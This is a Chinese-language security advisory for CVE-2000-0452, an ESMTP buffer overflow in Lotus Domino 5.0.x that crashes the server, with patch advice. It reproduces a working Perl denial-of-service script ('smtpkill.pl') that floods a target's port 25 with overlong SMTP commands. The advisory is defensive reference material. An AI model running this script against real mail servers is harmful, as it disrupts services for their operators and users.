发布日期：2000-03-18
更新日期：2000-03-18

受影响系统：

Lotus Domino Enterprise Server 5.0.3
Lotus Domino Enterprise Server 5.0.2
Lotus Domino Mail Server 5.0.3
Lotus Domino Mail Server 5.0.2
Lotus Domino Mail Server 5.0.1
Lotus Domino Enterprise Server 5.0.1
    - HP HP-UX 11.04
    - IBM AIX 4.3.2
    - Linux系统 kernel 2.2
    - Microsoft Windows NT 4.0
    - Sun Solaris 7.0

描述：

---

BUGTRAQ  ID: 1229
CVE(CAN) ID: CVE-2000-0452

Lotus Domino服务器是一款基于WEB合作的应用程序架构，运行在Linux/Unix和Microsoft Windows操作系统平台下。

Lotus Domino服务器的ESMTP服务存在缓冲区溢出漏洞，远程攻击者可能可以利用这个漏洞进行拒绝服务攻击。

Lotus Domino服务器的ESMTP服务在处理'rcpt to'、'saml from'和'soml from'命令时缺乏缓冲区检查。如果Lotus Domino服务器接受到这三个命令中任意一个，并且参数超过4 KB，系统将崩溃并且只有重起才能恢复继续服务。

<*来源：Michal Zalewski （lcamtuf@dione.ids.pl）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=95877957401631&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=96869172909708&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

smiler@vxd.org（smiler@vxd.org） 提供了如下测试程序：

#!/usr/bin/perl
# Need net::telnet to run
# Expl0it By smiler@vxd.org
# Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
# and probably many others that I hadnt chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)

use Net::Telnet;  


print "SmtpKILL By smiler\@vxd.org\n";

if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl  <type> <host>
    <type> Type of attack :
        type 1 = long mail from: someone\@4k_of_junk
        type 2 = long rcpt to: someone\@4k_of_junk
        type 3 = long helo longdomain_with_4k_of_junk
        type 4 = long undefined command (4k_of_junk)
        type 5 = long help 4k_of_junk
        type 6 = long mail from: and mail to:

    <host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}      

$type=$ARGV[0];
$target=$ARGV[1];

print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";



for ($i=4096;$i<5096;$i++)
{
        $obj=Net::Telnet->new( Host => "$target",Port => 25);    

    if ($type=~ "1") {
    $helo="helo ptrulez";
    $from="mail from: v0v0@". 'ptrulez' x $i;
    $rcpt="rcpt to: v0v0\@v0v0.pt";
    }

    if ($type=~ "2") {
    $helo="helo ptrulez";
    $from="mail from: v0v0\@v0v0.pt";
    $rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
    }

    if ($type=~ "3") {
    $helo="helo ". 'ptrulez' x $i;
    $from="mail from: v0v0\@v0v0.pt";
    $rcpt="rcpt to: v0v0\@v0v0.pt";
    }

    if ($type=~ "4") {
    $helo="havesomefun". 'ptrulez' x $i;
    }

    if ($type=~ "5") {
    $helo="help ". 'ptrulez' x $i;
    }

    if ($type=~ "6") {
    $helo="helo ptrulez";
    $from="mail from: ". 'ptrulez' x $i;
    $rcpt="rcpt to: ". 'ptrulez' x $i;
    }

        print "$helo\n";$obj->print("$helo");  
        print "$from\n";$obj->print("$from");
        print "$rcpt\n";$obj->print("$rcpt");    
        $obj->close;
}

建议：

---

厂商补丁：

Lotus
-----
目前厂商已经发布了升级补丁以修复这个安全问题，升级到Lotus Domino 5.0.5以上版本：

http://www.lotus.com/

浏览次数：8511
严重程度：0（网友投票）